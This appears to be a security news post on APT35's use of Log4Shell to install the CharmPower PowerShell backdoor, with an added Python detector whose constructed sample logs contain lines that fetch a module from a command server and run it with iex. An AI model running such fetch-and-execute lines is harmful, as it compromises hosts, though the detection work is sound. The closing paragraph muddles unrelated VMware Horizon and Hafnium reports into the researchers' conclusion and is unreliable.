
Iranian Hackers Use A Log4j Vulnerability To Install A Backdoor In PowerShell.

Check Point researchers reported that “The actor’s attack setup was fast, as they employed a basic open-source tool for exploitation and built their activities on existing infrastructure, making the attack easy to detect and attribute.”

The attackers employed one of the publicly accessible open-source JNDI exploit kits to exploit the Log4j vulnerability (CVE-2021-44228); the kit has since been removed from GitHub because of the popularity it gained after the vulnerability’s disclosure. We will omit the details of the actual exploitation phase, because several analytical papers already demonstrate how the vulnerability can be exploited.

An Iranian state-sponsored actor has been observed scanning Java applications for the Log4Shell vulnerability and attempting to exploit it to deploy a previously undocumented PowerShell-based modular backdoor called “CharmPower” for post-exploitation.

According to the Israeli cybersecurity firm, which cited parallels with toolsets previously identified as being used by the threat actor, the attack was linked to a group known as APT35, which is also tracked under the names Charming Kitten, Phosphorus, and TA453.

Log4Shell, also known as CVE-2021-44228 (CVSS score: 10.0), is a critical security flaw in the popular Log4j logging library that, if exploited successfully, allows remote execution of arbitrary code on vulnerable systems.

The downloaded PowerShell payload is the main module: it handles basic communication with the C&C server and executes any modules it receives. The main module carries out the following steps:

  • Validate network connection – When the script is run, it makes HTTP POST requests to google.com with the parameter hi=hi to check for an active internet connection.
  • Basic system information – The script collects the Windows OS version, the computer name, and the contents of a file named Ni.txt in the $APPDATA directory; the file is probably created and populated by other modules that the main module later downloads.
  • Retrieve the C&C domain – The malware decodes the C&C domain obtained from the hardcoded URL hxxps:/s3.amazonaws[.]com/doclibrarysales/3, the same S3 bucket from which the backdoor itself was downloaded.
  • Receive, decrypt, and execute modules – Modules sent by the C&C server are received, decrypted, and run by the main module.
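As an added example (not code from this post or from Check Point’s report), the following Python script turns the main-module behaviours listed above into a few detection rules and runs them over PowerShell script-block log text of the kind collected as Event ID 4104. The sample records are constructed for illustration; the S3 path and the Ni.txt file name are the post’s own indicators (refanged), while the rule names, the scoring threshold and the decode-then-invoke heuristic are assumptions of mine.

```python
"""Detection helper for the CharmPower main-module behaviours described in the post.
Added example, not code from the post or from Check Point; sample records are constructed."""
import re
from dataclasses import dataclass, field

# Each rule ties one behaviour named in the write-up to a regex over script text.
# The S3 path and Ni.txt come from the write-up; the remaining patterns are generic
# heuristics (assumption) for the decode-and-execute step.
RULES = {
    # POST to google.com carrying the parameter hi=hi (connectivity check)
    "connectivity_check_hi_hi": re.compile(
        r"google\.com.*?\bhi=hi\b|\bhi=hi\b.*?google\.com", re.I | re.S),
    # reading Ni.txt from the APPDATA directory (system-information step)
    "reads_ni_txt_in_appdata": re.compile(
        r"\$env:APPDATA[\\/]+Ni\.txt|%APPDATA%[\\/]+Ni\.txt", re.I),
    # the hardcoded S3 location used to retrieve the C&C domain
    "c2_domain_from_s3_bucket": re.compile(
        r"s3\.amazonaws\.com/doclibrarysales/", re.I),
    # base64 decode followed by in-memory execution (module execution step)
    "decode_and_invoke_module": re.compile(
        r"FromBase64String.*?(Invoke-Expression|\biex\b)", re.I | re.S),
}


@dataclass
class Finding:
    record_id: str
    matched_rules: list = field(default_factory=list)

    @property
    def score(self) -> int:
        # one point per behaviour matched; several together are far more telling than one
        return len(self.matched_rules)


def scan_script_block(record_id: str, script_text: str) -> Finding:
    """Return a Finding listing which of the described behaviours the script text shows."""
    finding = Finding(record_id)
    for name, pattern in RULES.items():
        if pattern.search(script_text):
            finding.matched_rules.append(name)
    return finding


def triage(records, threshold: int = 2):
    """records: iterable of (record_id, script_text).
    Return findings whose score meets the threshold, highest score first."""
    hits = [scan_script_block(rid, text) for rid, text in records]
    return sorted((h for h in hits if h.score >= threshold), key=lambda h: -h.score)


# Constructed sample script-block contents (Event ID 4104 style); not real malware.
SAMPLE_RECORDS = [
    ("evt-1001",
     "Invoke-WebRequest -Uri 'https://google.com' -Method POST -Body 'hi=hi'\n"
     "$os = (Get-CimInstance Win32_OperatingSystem).Caption\n"
     "$ni = Get-Content \"$env:APPDATA\\Ni.txt\"\n"
     "$c2 = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("
     "(Invoke-WebRequest 'https://s3.amazonaws.com/doclibrarysales/3').Content))\n"
     "$mod = Invoke-WebRequest \"https://$c2/m\"; iex $mod.Content\n"),
    ("evt-1002",
     "Get-ChildItem $env:APPDATA | Where-Object Name -like '*.txt'\n"),
    ("evt-1003",
     "$b = [Convert]::FromBase64String($payload); "
     "Invoke-Expression ([Text.Encoding]::UTF8.GetString($b))\n"),
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_RECORDS):
        print(finding.record_id, finding.score, finding.matched_rules)
```

The default threshold of two deliberately drops evt-1003, which only shows the generic decode-and-invoke pattern; on its own that pattern is common in legitimate administration scripts, whereas the combination with the Ni.txt read or the S3 path is specific to what the post describes. Lower the threshold to one when hunting broadly and review the extra hits by hand.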

CharmPower’s modules also include tools for gathering system information, listing installed applications, taking screenshots, listing running processes, executing commands supplied by the C2 server, and cleaning up any traces left behind by these components.

Finally, the researchers concluded that Microsoft and the NHS have warned that internet-facing systems running VMware Horizon are being targeted for web shells and a ransomware strain known as NightSky, with the latter being linked to a China-based operator known as DEV-0401, which has previously deployed LockFile, AtomSilo, and Rook ransomware. Furthermore, Hafnium, a Chinese threat actor group, has been detected exploiting the vulnerability to attack virtualized infrastructure in order to broaden their targeting.

For more cyber security news in crisp content, please follow our site via our Twitter handle @cyberworkx1 and LinkedIn handle @linkedin.
